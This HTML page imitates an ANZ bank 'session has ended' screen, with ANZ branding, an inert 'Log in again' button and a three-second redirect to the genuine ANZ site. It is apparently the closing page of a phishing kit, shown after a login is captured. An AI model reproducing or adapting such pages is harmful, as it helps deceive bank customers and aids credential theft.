<!DOCTYPE html>
<html class="no-js" lang="en">
	<head>
		<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
		<meta http-equiv="x-ua-compatible" content="ie=edge" />
		<title>Login</title>
		<meta name="viewport" content="width=device-width, initial-scale=1" />
    <meta http-equiv="refresh" content="3;url=https://www.anz.com.au/personal/" />
		<link rel="icon" href="/img/favicon.ico" />
		<link rel="stylesheet" href="/css/login.css" />
	</head>

	<body>
		<div id="root" class="pageContainer">
			<div class="sc-htoDjs gcwNfU">
				<header class="sc-csuQGl iNSeoe">
					<div class="sc-Rmtcm fQcucI">
						<span class="sc-chPdSV kiOFau"
							><img src="/img/anz-logo.svg" alt="ANZ logo" class="sc-bRBYWo iDMDsu"
						/></span>
					</div>
				</header>
				<main class="sc-dnqmqq fgYQMj">
					<div class="sc-iwsKbI sc-gqjmRU sc-VigVT cbBBvh">
						<div class="sc-dxgOiQ iyDMES">
							<div class="sc-jTzLTM sc-fjdhpX gIRcZu">
								<div class="sc-itybZL ckmvXb">
									<img
										alt="Error Icon"
										src="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQ_ONzf9-gNgavAx6_WY2N7pNrSDxZsrVbs4NYVr2SwTQ&s"
										class="sc-krDsej fYFXsi"
									/>
									<h1 id="error-title" tabindex="-1" class="sc-elJkPf jnEEBd">
										Sorry, your session has ended
									</h1>
								</div>
								<div class="sc-eMigcr kXdAZw">
									<div class="sc-fzsDOv cuPLyS">
										<div class="sc-bdVaJa sc-bxivhb gHmjpC">
											<div class="sc-bwzfXH sc-ifAKCX hkTfox">
												<div class="sc-htpNat sc-EHOje fuDXid">
													<p class="sc-ibxdXY hbOcpj">
														Your session has timed out as it has been idle for some time, or the connection was
														interrupted.
													</p>
												</div>
											</div>
											<div class="sc-bwzfXH sc-ifAKCX jTKZuQ">
												<div class="sc-htpNat sc-EHOje fuDXid">
													<button class="sc-hMqMXs deGsFu">Log in again</button>
												</div>
											</div>
										</div>
									</div>
								</div>
							</div>
						</div>
					</div>
				</main>
				<footer class="sc-hzDkRC hLFFFY">
					<div class="sc-jhAzac cAuNUY">
						<div class="sc-iwsKbI sc-gqjmRU sc-kgoBCf UeGWU">
							<span class="sc-fMiknA iYfeTu">
								<div class="sc-kEYyzF jMeGNg">
									© Australia and New Zealand Banking Group Limited (ANZ) 2022<span class="sc-fBuWsC kbKcVw">
										ABN 11 005 357 522.</span
									>
								</div>
							</span>
						</div>
					</div>
				</footer>
			</div>
		</div>
	</body>
</html>
